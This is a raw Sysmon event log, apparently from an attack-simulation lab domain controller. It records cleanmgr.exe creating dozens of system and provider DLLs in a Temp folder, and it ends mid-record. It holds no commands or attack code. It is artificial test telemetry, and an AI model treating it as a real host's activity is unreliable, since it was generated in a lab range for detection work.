07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringloader-l1-1-1.dll2021-07-12 07:56:58.783 11241100x80000000000000001050752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringansi-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-l2-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-string-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shutdown-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-legacy-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-rtlsupport-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l2-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-realtime-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-profile-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processtopology-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-2.dll2021-07-12 07:56:58.783 11241100x80000000000000001050738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-0.dll2021-07-12 07:56:58.767 
11241100x80000000000000001050732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-namedpipe-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-2.dll2021-07-12 07:56:58.767 11241100x80000000000000001050730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-localization-obsolete-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-1.dll2021-07-12 07:56:58.767 
11241100x80000000000000001050726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-1.dll2021-07-12 
07:56:58.767 11241100x80000000000000001050720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.764{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-0.dll2021-07-12 07:56:58.764 11241100x80000000000000001050719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.763{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-1.dll2021-07-12 07:56:58.762 11241100x80000000000000001050718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.761{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-0.dll2021-07-12 07:56:58.761 11241100x80000000000000001050717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.760{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-interlocked-l1-1-0.dll2021-07-12 07:56:58.759 11241100x80000000000000001050716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.757{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dll2021-07-12 07:56:58.757 11241100x80000000000000001050715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.757{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-heap-l1-1-0.dll2021-07-12 07:56:58.757 
11241100x80000000000000001050714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.756{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-handle-l1-1-0.dll2021-07-12 07:56:58.756 11241100x80000000000000001050713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.755{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-1.dll2021-07-12 07:56:58.755 11241100x80000000000000001050712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.755{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-0.dll2021-07-12 07:56:58.754 11241100x80000000000000001050711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.754{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-1.dll2021-07-12 07:56:58.752 11241100x80000000000000001050710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.752{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-0.dll2021-07-12 07:56:58.752 11241100x80000000000000001050709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.751{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-1-0.dll2021-07-12 07:56:58.751 
11241100x80000000000000001050708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.751{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-1.dll2021-07-12 07:56:58.750 11241100x80000000000000001050707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.750{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-0.dll2021-07-12 07:56:58.750 11241100x80000000000000001050706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.749{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-1.dll2021-07-12 07:56:58.749 11241100x80000000000000001050705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.749{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-0.dll2021-07-12 07:56:58.749 11241100x80000000000000001050704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.748{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-delayload-l1-1-0.dll2021-07-12 07:56:58.747 11241100x80000000000000001050703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.746{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-1.dll2021-07-12 07:56:58.746 
11241100x80000000000000001050702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.746{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-0.dll2021-07-12 07:56:58.746 11241100x80000000000000001050701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.745{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-1.dll2021-07-12 07:56:58.745 11241100x80000000000000001050700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-0.dll2021-07-12 07:56:58.744 11241100x80000000000000001050699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-console-l1-1-0.dll2021-07-12 07:56:58.743 11241100x80000000000000001050698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.742{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-comm-l1-1-0.dll2021-07-12 07:56:58.742 11241100x80000000000000001050697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.742{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-com-l1-1-0.dll2021-07-12 07:56:58.742 
11241100x80000000000000001050696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.741{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-base-util-l1-1-0.dll2021-07-12 07:56:58.740 11241100x80000000000000001050695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.735{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\WimProvider.dll2021-07-12 07:56:58.735 11241100x80000000000000001050694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.734{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\VhdProvider.dll2021-07-12 07:56:58.734 11241100x80000000000000001050693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.734{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\UnattendProvider.dll2021-07-12 07:56:58.734 11241100x80000000000000001050692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.733{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\TransmogProvider.dll2021-07-12 07:56:58.733 11241100x80000000000000001050691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.732{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\SmiProvider.dll2021-07-12 07:56:58.732 11241100x80000000000000001050690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.731{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ProvProvider.dll2021-07-12 07:56:58.730 11241100x80000000000000001050689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.730{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OSProvider.dll2021-07-12 07:56:58.729 11241100x80000000000000001050688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.729{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OfflineSetupProvider.dll2021-07-12 07:56:58.729 11241100x80000000000000001050687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\MsiProvider.dll2021-07-12 07:56:58.728 11241100x80000000000000001050686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.727{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\LogProvider.dll2021-07-12 07:56:58.727 11241100x80000000000000001050685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.726{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IntlProvider.dll2021-07-12 07:56:58.726 11241100x80000000000000001050684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.725{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ImagingProvider.dll2021-07-12 07:56:58.725 11241100x80000000000000001050683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.725{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IBSProvider.dll2021-07-12 07:56:58.725 11241100x80000000000000001050682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.724{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\GenericProvider.dll2021-07-12 07:56:58.724 11241100x80000000000000001050681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.723{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FolderProvider.dll2021-07-12 07:56:58.723 11241100x80000000000000001050680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.723{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FfuProvider.dll2021-07-12 07:56:58.722 23542300x80000000000000001050679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 